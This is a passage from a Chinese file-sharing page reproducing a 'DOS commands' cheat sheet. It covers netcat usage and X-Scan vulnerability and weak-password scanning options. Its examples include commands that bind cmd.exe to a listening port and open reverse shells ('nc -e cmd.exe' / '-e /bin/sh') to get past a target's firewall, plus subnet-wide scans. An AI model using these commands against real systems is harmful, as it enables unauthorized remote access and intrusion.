DOS命令大全(经典收藏) - New -

《DOS命令大全(经典收藏) - New -》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、DOS命令大全(经典收藏)-New-.txt33学会宽容，意味着成长，秀木出木可吸纳更多的日月风华，舒展茁壮而更具成熟的力量。耐力，是一种不显山石露水的执着；是一种不惧风不畏雨的坚忍；是一种不图名不图利的忠诚。（二）系统外部命令(均需下载相关工具)：1、瑞士军刀：nc.exe参数说明：-h查看帮助信息-d后台模式-eprog程序重定向，一但连接就执行［危险］-isecs延时的间隔-l监听模式，用于入站连接-L监听模式，连接天闭后仍然继续监听，直到CTR+C-nIP地址，不能用域名-ofilm记录16进制的传输-p[空格]端口本地端口

2、号-r随机本地及远程端口-t使用Telnet交互方式-uUDP模式-v详细输出，用-vv将更详细-w数字timeout延时间隔-z将输入，输出关掉（用于扫锚时）基本用法：nc-nvv192.168.0.180连接到192.168.0.1主机的80端口nc-l-p80开启本机的TCP80端口并监听nc-nvv-w2-z192.168.0.180-1024扫锚192.168.0.1的80-1024端口nc-l-p5354-t-ec:winntsystem32cmd.exe绑定remote主机的cmdshell在remote的TCP535

3、4端口nc-t-ec:winntsystem32cmd.exe192.168.0.25354梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口高级用法：nc-L-p80作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止nc-L-p80>c:log.txt作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:log.txtnc-L-p80

4、内容送入管道中，亦可起到传送文件作用type.exec:honeyport

5、nc-L-p80作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用本机上用：nc-l-p本机端口在对方主机上用：nc-ecmd.exe本机IP-p本机端口*win2Knc-e/bin/sh本机IP-p本机端口*linux,unix反向连接突破对方主机的防火墙本机上用：nc-d-l-p本机端口<要传送的文件路径及名称在对方主机上用：nc-vv本机IP本机端口>存放文件的路径及

6、名称传送文件到对方主机备注：

7、管道命令<或>重定向命令。"<"，例如：tlntadmn>d:log.txt意思是：后台执行dir，并把结果存在d:log.txt中>与>>的区别　">"指：覆盖；">>"指：保存到(添加到）。如：@dirc:winnt>>d:log.txt和@dirc:winnt>d:log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存

8、了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。#8八：2、扫锚工具：xscan.exe基本格式xscan-host<起始IP>[-<终止IP>]<检测项目>[其他选项]扫锚"起始IP到终止IP"段的所有主机信息xscan-file<主机列表文件名><检测项目>[其他选项]扫锚"主机IP列表文件名"中的所有主机信息检测项目-active检测主机是否存活-os检测远程操作系统类型（通过NETBIOS和SNMP协议）-port检测常用服务的端口状态-ftp检测FTP弱口令-pub检测FTP服务匿名用户写权限-pop3检

9、测POP3-Server弱口令-smtp检测SMTP-Server漏洞-sql检测SQL-Server弱口令-smb检测NT-Server弱口令-iis检测IIS编码/解码漏洞-cgi检测CGI漏洞-nasl加载Nessus攻击脚本-all检测以上所有项目其它选项-i适配器编号设置网络适配器,<适配器编号>可通过"-l"参数获取-l显示所有网络适配器-v显示详细扫描进度-p跳过没有响应的主机-o跳过没有检测到开放端口的主机　-t并发线程数量,并发主机数量指定最大并发线程数量和并发主机数量,默认数量为100,10-log文件名指定扫描

10、报告文件名(后缀为：TXT或HTML格式的文件)用法示例xscan-host192.168.1.1-192.168.255.255-all-active-p　检测192.168.1.1-192.168.255.255网段内主机的所有漏